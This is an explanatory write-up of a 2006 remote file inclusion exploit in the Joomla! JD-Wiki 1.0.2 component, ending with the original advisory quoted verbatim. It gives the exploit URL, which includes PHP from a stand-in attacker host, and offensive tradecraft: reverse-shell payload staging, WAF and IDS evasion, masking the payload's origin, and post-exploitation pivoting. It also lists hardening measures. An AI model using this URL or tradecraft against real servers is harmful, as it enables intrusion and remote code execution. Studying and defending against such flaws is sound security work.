Understanding the Joomla! JD-Wiki 1.0.2 Remote File Inclusion Exploit

What this paper is

This paper details a security vulnerability found in JD-Wiki, a Joomla! component that integrates DokuWiki. The vulnerability is a Remote File Inclusion (RFI) flaw, which allows an attacker to execute commands on the target server by tricking the application into including and executing a remote file.

Simple technical breakdown

The JD-Wiki component, when handling certain requests, uses a parameter named mosConfig_absolute_path. If this parameter is pointed to a remote URL (like one controlled by an attacker), the application might include and execute code from that remote URL. This is because PHP's file inclusion functions can sometimes be tricked into treating a remote URL as a local file path, especially if the server is misconfigured or the application doesn't properly sanitize input.

Complete code and payload walkthrough

The provided exploit description is very concise and doesn't contain explicit code in the traditional sense of a script or binary. Instead, it describes the method of exploitation using a URL.

• Exploit URL Structure:
  /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell

• Explanation of Components:

  • /components/com_jd-wiki/lib/tpl/default/main.php: This is the target PHP file within the JD-Wiki component that is vulnerable. It's likely responsible for rendering wiki pages or handling template includes.
  • ?mosConfig_absolute_path=: This is the vulnerable parameter. The name suggests it's intended to specify an absolute path for configuration or includes.
  • http://shell: This is the attacker-controlled URL. The attacker would replace shell with a domain they control, which hosts a malicious PHP file. When the JD-Wiki component processes this URL, it attempts to fetch and include the content from http://shell. If the PHP include or require functions are used insecurely within main.php and are susceptible to RFI, the code from http://shell will be executed on the Joomla! server.

• Mapping:

  • main.php -> The vulnerable script that processes the mosConfig_absolute_path parameter.
  • mosConfig_absolute_path -> The input parameter that, when controlled by an attacker with a remote URL, leads to RFI.
  • http://shell -> The attacker-controlled remote resource containing malicious code.

• Payload (Conceptual):
  The "payload" here isn't raw shellcode bytes but rather the content of the file hosted at http://shell. This file would typically contain PHP code designed to achieve a specific malicious objective, such as:

  • Web Shell: A PHP script that provides a command execution interface on the server.
  • Information Disclosure: A script that leaks sensitive configuration files or database credentials.
  • Further Exploitation: A script that downloads and executes other malware.

  The original paper does not provide the content of the http://shell file, so its exact nature is unknown.

Practical details for offensive operations teams

• Required Access Level: Low. This is a remote vulnerability exploitable via a web browser or a simple HTTP request. No authenticated access to the Joomla! backend is required.
• Lab Preconditions:
  • A vulnerable Joomla! installation with the JD-Wiki component (version 1.0.2) installed.
  • A web server accessible to the target Joomla! server that can host attacker-controlled PHP files.
  • Network connectivity between the target Joomla! server and the attacker-controlled web server.
• Tooling Assumptions:
  • A web browser for manual testing.
  • Tools like curl or wget for crafting HTTP requests.
  • A simple HTTP server (e.g., Python's http.server, Apache, Nginx) to host the malicious PHP payload.
• Execution Pitfalls:
  • Firewall/Network Restrictions: The target server might not be able to reach the attacker's hosting server due to outbound firewall rules.
  • PHP Configuration (allow_url_fopen, allow_url_include): The vulnerability relies on PHP being configured to allow remote file inclusions. If allow_url_fopen is disabled, the RFI might not work. If allow_url_include is disabled, even if allow_url_fopen is enabled, the server might refuse to include remote files.
  • Input Sanitization: Later versions of JD-Wiki or Joomla! might have patched this specific vulnerability or implemented better input sanitization, preventing the mosConfig_absolute_path parameter from being interpreted as a remote URL.
  • Payload Hosting: The attacker's server must be stable and accessible.
  • Obfuscation: The attacker might need to obfuscate their payload to bypass basic web application firewalls (WAFs) or intrusion detection systems (IDS).
• Tradecraft Considerations:
  • Reconnaissance: Identify the target Joomla! version and installed components to confirm the presence of JD-Wiki 1.0.2.
  • Payload Staging: Prepare a small, effective PHP payload that can establish a reverse shell or provide command execution.
  • Stealth: Use a reputable domain for hosting the payload to avoid immediate suspicion. Consider using a CDN or proxy to mask the origin of the payload.
  • Post-Exploitation: Once a shell is obtained, immediately look for ways to escalate privileges or pivot to other systems.

Where this was used and when

• Context: This vulnerability was discovered and published in 2006. It targets a specific component (JD-Wiki 1.0.2) within the Joomla! CMS.
• Timeframe: The exploit was published on August 7, 2006. It would have been relevant for systems running Joomla! with this vulnerable component during that period and shortly thereafter, until patches were applied.

Defensive lessons for modern teams

• Vulnerability Management: Regularly scan for and patch known vulnerabilities in CMS platforms and their extensions.
• Input Validation: Implement strict input validation for all user-supplied data, especially parameters used in file inclusion or path operations. Sanitize and validate URLs.
• PHP Configuration Hardening:
  • Disable allow_url_fopen and allow_url_include in php.ini unless absolutely necessary for legitimate application functionality. This is a critical defense against RFI.
  • Restrict open_basedir to prevent PHP scripts from accessing files outside their designated directories.
• Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including RFI attempts.
• Least Privilege: Run web servers and applications with the minimum necessary privileges to limit the impact of a successful compromise.
• Component Auditing: Be cautious when installing third-party extensions. Audit their code for security flaws or use reputable sources with a history of secure development.

ASCII visual (if applicable)

This exploit is a direct HTTP request to a vulnerable server. An ASCII visual can illustrate the flow of the request and response.

+-----------------+       +-------------------+       +---------------------+
| Attacker's      | ----> | Target Joomla!    | ----> | Attacker's Payload  |
| Machine (Browser|       | Server (JD-Wiki)  |       | Server (e.g., http://shell)|
| / Curl)          |       |                   |       |                     |
+-----------------+       +-------------------+       +---------------------+
      |                               |
      | HTTP Request                  |
      | (GET /...main.php?mosConfig_ |
      | absolute_path=http://shell)   |
      |                               |
      |------------------------------>|
      |                               |
      |                               | HTTP Request to Payload Server
      |                               | (GET /...)
      |                               |
      |                               |------------------------------>|
      |                               |                               |
      |                               |                               | HTTP Response (Malicious PHP Code)
      |                               |                               |<------------------------------|
      |                               |                               |
      |                               | HTTP Response (Rendered page |
      |                               | with executed payload)        |
      |<------------------------------|
      |
      | (Attacker receives result of |
      | executed payload)           |

Source references

• Paper URL: https://www.exploit-db.com/papers/2125
• Author: jank0
• Published: 2006-08-07
• Original Source: milw0rm.com

Original Exploit-DB Content (Verbatim)

####################################################################################
#JD-Wiki Remote File Include
------------------------------------------------------------------------------------
JD-Wiki is the Joomla! integration of the nice DokuWiki.
DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating 
documentation of any kind.
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi

path: ?mosConfig_absolute_path=

xpl:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell


Contact: irc.undernet.org #hackbsd & #ircmasters

# milw0rm.com [2006-08-07]